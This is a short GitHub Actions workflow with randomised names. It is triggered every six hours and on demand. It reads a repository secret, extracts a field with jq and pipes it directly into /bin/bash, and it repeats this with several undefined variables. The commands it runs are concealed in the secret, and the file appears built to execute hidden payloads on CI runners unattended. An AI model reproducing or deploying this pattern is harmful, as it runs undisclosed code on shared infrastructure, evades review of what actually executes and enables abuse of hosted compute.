name: qimutou9183

on:
  workflow_dispatch:
  schedule:
    - cron: '50 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qimutou9183
        env:
          zqp50: ${{ secrets.zqp50 }}
        run: |
          echo $zqp50 | jq -r .ul48923 | /bin/bash
          echo $bu24219 | jq -r .c178 | /bin/bash
          echo $imnk5 | jq -r .wzi7 | /bin/bash
          echo $ioi168 | jq -r .htnmp85 | /bin/bash

